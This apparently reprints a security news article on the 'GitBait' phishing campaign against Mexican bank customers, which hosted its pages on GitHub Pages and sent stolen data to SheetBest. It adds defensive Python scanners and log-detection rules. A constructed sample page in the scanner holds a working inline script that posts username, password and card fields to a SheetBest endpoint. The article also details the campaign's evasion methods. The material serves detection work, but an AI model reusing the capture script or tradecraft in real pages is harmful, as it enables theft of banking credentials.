A phishing campaign tracked as “GitBait” has targeted customers of at least 12 Mexican financial institutions over roughly three years, using more than 100 GitHub-hosted domains and no traditional server infrastructure, according to new analysis from Group-IB.
GitBait’s footprint on GitHub and cloud services
Group-IB says the campaign operated without a dedicated backend, hosting cloned bank pages on GitHub Pages and routing stolen credentials through SheetBest — a legitimate service that writes data directly into Google Sheets. The firm counted more than 100 GitHub-hosted domains tied to the operation and reported all of them to GitHub. By relying on trusted cloud domains and third‑party services, the campaign left little in the way of infrastructure for investigators to seize.
How the kit captured credentials and hid in plain sight
Victims were presented with pages that closely cloned the branding of the targeted banks. The pages contained forms that captured usernames, customer IDs, passwords and card details. A client-side script collected those entries, submitted them to SheetBest, and then displayed a fake verification screen to maintain the illusion of a legitimate transaction. Group-IB could not confirm the lure used to get victims to the sites, but the pages carried crafted Open Graph tags, so that links shared over WhatsApp, Telegram or SMS rendered as convincing, bank-branded preview cards. The sites also carried a robots noindex meta tag to keep themselves out of search engine results; a side effect is that search-based brand monitoring does not surface them either.
Modularity, automation, and operational tradecraft
At the heart of the operation was a modular phishing kit with an operator panel that supported desktop and mobile templates. Group-IB found that each GitHub repository contained duplicated pages, so that a page taken down individually could be redeployed quickly. The commit history of one repository showed 66 commits, indicating active upkeep; three contributor accounts, some sharing an email address; automated publishing via Jekyll and GitHub Actions; and an endpoint rotation performed by an operator account that was still active at the time of Group-IB’s analysis.
The pages also loaded obfuscated JavaScript from randomized paths. That design let operators swap payloads without changing the visible page HTML, and it frustrated static analysis that relies on scanning fixed paths or matching persistent payload fingerprints.
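The page features described in the two sections above (bank-branded Open Graph preview tags, a robots noindex directive, credential and card input fields, a client-side post to SheetBest, and scripts loaded from randomized paths) can be turned into a simple static scan for use in brand-abuse monitoring. The following is an added example written for this article, not code from Group-IB or from the kit; the sample pages are constructed, "ExampleBank" is a placeholder brand, and the SheetBest API hostname used in the sample is an assumption, which is why the check matches on the service name rather than a fixed host.

```python
import math
import re
from html.parser import HTMLParser

# Brand names to watch for in preview metadata. "ExampleBank" is a constructed placeholder,
# not a real institution; a bank would list its own brand and product names here.
WATCHED_BRANDS = {"examplebank"}
# The kit's data sink. Matching on the service name rather than a full hostname (the exact
# API host is an assumption here) keeps the check useful after an endpoint rotation.
SINK_PATTERN = re.compile(r"sheet\.?best", re.IGNORECASE)
# Input names (English and Spanish) that mark a credential or card-capture form.
CREDENTIAL_FIELDS = ("password", "clave", "pin", "card", "tarjeta", "cvv", "usuario", "username", "customerid")


class KitHints(HTMLParser):
    """Collects the features GitBait pages relied on: Open Graph preview tags, a robots
    noindex directive, credential-shaped inputs, external script paths and inline script."""

    def __init__(self):
        super().__init__()
        self.og, self.inputs, self.script_srcs, self.inline_js, self.form_actions = {}, [], [], [], []
        self.noindex = False
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "meta":
            prop = (a.get("property") or "").lower()
            if prop.startswith("og:"):
                self.og[prop] = a.get("content") or ""
            if (a.get("name") or "").lower() == "robots" and "noindex" in (a.get("content") or "").lower():
                self.noindex = True
        elif tag == "input":
            self.inputs.append((a.get("name") or a.get("id") or "").lower())
        elif tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "script":
            if a.get("src"):
                self.script_srcs.append(a["src"])
            else:
                self._in_script = True  # inline script body arrives via handle_data()

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.inline_js.append(data)


def shannon_entropy(s):
    return -sum(s.count(c) / len(s) * math.log2(s.count(c) / len(s)) for c in set(s)) if s else 0.0


def looks_randomized(path):
    """True for script names like /assets/q8z3k1vx9p2m.js: a long, purely alphanumeric basename
    with high character entropy. Heuristic only: hashed build artefacts also trip it."""
    base = path.rsplit("/", 1)[-1].rsplit(".", 1)[0]
    return len(base) >= 10 and base.isalnum() and shannon_entropy(base) >= 3.0


def scan(html):
    """Returns the list of kit indicators found in one page; an empty list means none fired."""
    p = KitHints()
    p.feed(html)
    preview = (p.og.get("og:title", "") + " " + p.og.get("og:site_name", "")).lower()
    found = []
    if any(b in preview for b in WATCHED_BRANDS):
        found.append("og_preview_impersonates_watched_brand")
    if p.noindex:
        found.append("robots_noindex")
    if any(k in name for name in p.inputs for k in CREDENTIAL_FIELDS):
        found.append("credential_form_fields")
    if any(looks_randomized(src) for src in p.script_srcs):
        found.append("randomized_script_path")
    if any(SINK_PATTERN.search(text) for text in p.inline_js + p.form_actions):
        found.append("sheetbest_data_sink")
    return found


# Constructed sample page modelled on the features described above; not a real kit artefact.
SAMPLE_PAGE = """<!doctype html><html><head>
<meta property="og:title" content="ExampleBank - Verifica tu cuenta">
<meta property="og:image" content="https://acme-dev.github.io/img/logo.png">
<meta name="robots" content="noindex, nofollow">
<script src="/assets/q8z3k1vx9p2m.js"></script></head><body>
<form id="login"><input name="usuario"><input name="password" type="password"><input name="tarjeta"></form>
<script>document.getElementById("login").onsubmit = function (e) { e.preventDefault();
  fetch("https://api.sheetbest.com/sheets/00000000-0000-0000-0000-000000000000",
        {method: "POST", body: JSON.stringify(Object.fromEntries(new FormData(e.target)))}); };
</script></body></html>"""

# Constructed benign page for contrast: no watched brand, ordinary script name, no sink.
BENIGN_PAGE = """<html><head><meta property="og:title" content="Weekly recipes">
<script src="/assets/application.js"></script></head><body><form><input name="email"></form></body></html>"""

if __name__ == "__main__":
    print(scan(SAMPLE_PAGE))
    print(scan(BENIGN_PAGE))
```

Each indicator on its own is weak (many legitimate sites set noindex or ship hashed asset names); the useful signal is the combination, in particular a watched brand in the preview metadata together with a form whose data leaves for a third-party sheet service. Run the scan over pages found by enumerating GitHub Pages sites rather than over search results, since noindex hides these pages from the latter.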
Why traditional protections can miss serverless phishing
Group-IB framed GitBait as part of a broader shift in which criminals use everyday cloud services and ready-made kits instead of custom malware and self-hosted servers, a trend that echoes the recent rise of phishing-as-a-service platforms. Because the pages were served from a trusted domain (GitHub Pages) and data exfiltration used a legitimate service (SheetBest into Google Sheets), blocklists of known-bad sites provide limited protection. Group-IB warned that reliance on domain reputation or static blocklists alone will likely miss operations that live on high-reputation cloud platforms.
What this means for Mexican banks, security teams, and customers
- Mexican banks: watch for brand abuse on GitHub Pages and similar hosting platforms, and monitor for cloned Open Graph metadata that enables believable link previews on messaging apps.
- Security and fraud teams: flag unexpected traffic to services like SheetBest and other cloud-based data sinks, prioritize behavioral detection over simple domain-blocking, and build takedown processes that anticipate automated redeployment rather than treating a single removal as final.
- Customers and account holders: be aware that convincing, bank-branded preview cards in messaging apps can accompany phishing links; Group-IB specifically recommended multi-factor authentication and transaction alerts as mitigations.
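The detection the list above asks of security teams, flagging unexpected traffic to SheetBest and tying it back to a GitHub Pages site, can be expressed as a small rule set over proxy logs. The following is an added example written for this article, not Group-IB's code or tooling. The log lines are constructed in a simplified "timestamp src_ip method url referer" format, the SheetBest API hostname and the allowlisted internal source are assumptions, and the correlation window is a tunable that is set here to 120 seconds. The second rule handles the case where browsers strip the Referer header, which is common under restrictive referrer policies.

```python
from collections import namedtuple
from datetime import datetime, timedelta
from urllib.parse import urlparse

# Hosts of the data sink the kit used (SheetBest writes into Google Sheets). The exact
# API hostname is an assumption here; take it from your own proxy logs.
DATA_SINK_HOSTS = {"api.sheetbest.com", "sheet.best"}
# Hosting platform whose reputation the kit borrowed: github.io is GitHub Pages.
STATIC_PAGE_SUFFIXES = (".github.io",)
# Constructed allowlist: internal sources that legitimately push form data to Sheets.
APPROVED_SINK_SOURCES = {"10.20.9.42"}
# How recently a source must have loaded a GitHub Pages site for a referer-less POST to count.
CORRELATION_WINDOW = timedelta(seconds=120)

# Constructed proxy log lines in a simplified "timestamp src_ip method url referer" format,
# written for this example; adapt parse_line() to your proxy's real format.
SAMPLE_LOG = """\
2024-05-02T10:14:03Z 10.20.1.15 GET https://acme-dev.github.io/acceso/ -
2024-05-02T10:14:05Z 10.20.1.15 GET https://acme-dev.github.io/assets/q8z3k1vx9p2m.js https://acme-dev.github.io/acceso/
2024-05-02T10:14:41Z 10.20.1.15 POST https://api.sheetbest.com/sheets/00000000-0000-0000-0000-000000000000 https://acme-dev.github.io/acceso/
2024-05-02T10:20:10Z 10.20.3.7 GET https://team-wiki.github.io/runbooks/ -
2024-05-02T10:21:02Z 10.20.3.7 POST https://api.sheetbest.com/sheets/11111111-1111-1111-1111-111111111111 -
2024-05-02T11:02:00Z 10.20.9.42 POST https://api.sheetbest.com/sheets/22222222-2222-2222-2222-222222222222 https://intranet.example.internal/forms
2024-05-02T11:30:00Z 10.20.5.88 GET https://api.sheetbest.com/sheets/33333333-3333-3333-3333-333333333333 -
"""

Event = namedtuple("Event", "ts src method host referer_host")
Alert = namedtuple("Alert", "severity rule src ts")


def parse_line(line):
    ts, src, method, url, referer = line.split(" ", 4)
    host = urlparse(url).netloc.lower()
    ref_host = urlparse(referer).netloc.lower() if referer != "-" else None
    return Event(datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), src, method, host, ref_host)


def is_sink(host):
    return host in DATA_SINK_HOSTS or host.endswith(".sheetbest.com")


def is_static_page_host(host):
    return host is not None and host.endswith(STATIC_PAGE_SUFFIXES)


def detect(log_text):
    """Walks the log once, remembering the last GitHub Pages load per source so that a POST
    to the data sink can be tied to the phishing page even when the referer is stripped."""
    last_pages_load = {}
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_line(line)
        if is_static_page_host(ev.host):
            last_pages_load[ev.src] = ev.ts  # plain GitHub Pages browsing is not alerted on
        if not is_sink(ev.host):
            continue
        recent = last_pages_load.get(ev.src)
        if ev.method == "POST" and is_static_page_host(ev.referer_host):
            alerts.append(Alert("high", "post_to_sheetbest_with_github_pages_referer", ev.src, ev.ts))
        elif ev.method == "POST" and recent is not None and ev.ts - recent <= CORRELATION_WINDOW:
            alerts.append(Alert("high", "post_to_sheetbest_after_github_pages_load", ev.src, ev.ts))
        elif ev.src not in APPROVED_SINK_SOURCES:
            alerts.append(Alert("medium", "unexpected_sheetbest_traffic", ev.src, ev.ts))
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(a.severity, a.rule, a.src, a.ts.isoformat())
```

The rules deliberately key on the data sink rather than on GitHub Pages itself: blocking or alerting on every github.io request would be unworkable in most organizations, while form submissions to a sheet-writing API from an endpoint that just loaded a GitHub Pages site are rare enough to review by hand. The allowlist exists because some teams do use such services legitimately; without it the medium-severity rule becomes noise.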
Group-IB’s findings show a criminal calculus built on operational efficiency: host pages where takedown is slow or fragmented, send harvested data through legitimate platforms that are unlikely to be blocked, and automate redeployment so removals are a temporary inconvenience. The firm reported the discovered domains to GitHub and urged banks to shift defensive effort from static blocklists to active monitoring for brand abuse and anomalous traffic to cloud services such as SheetBest.
The case raises a pointed question for defenders: when threat actors can build fully functional phishing backends with no dedicated servers, how should defenders prioritize detections and takedowns across the cloud platforms those actors exploit? Group-IB’s reporting offers a practical starting point: watch GitHub for brand impersonation, flag unexpected SheetBest activity, and assume that a trusted domain does not imply trusted content.
https://www.infosecurity-magazine.com/news/gitbait-github-pages-sheetbest/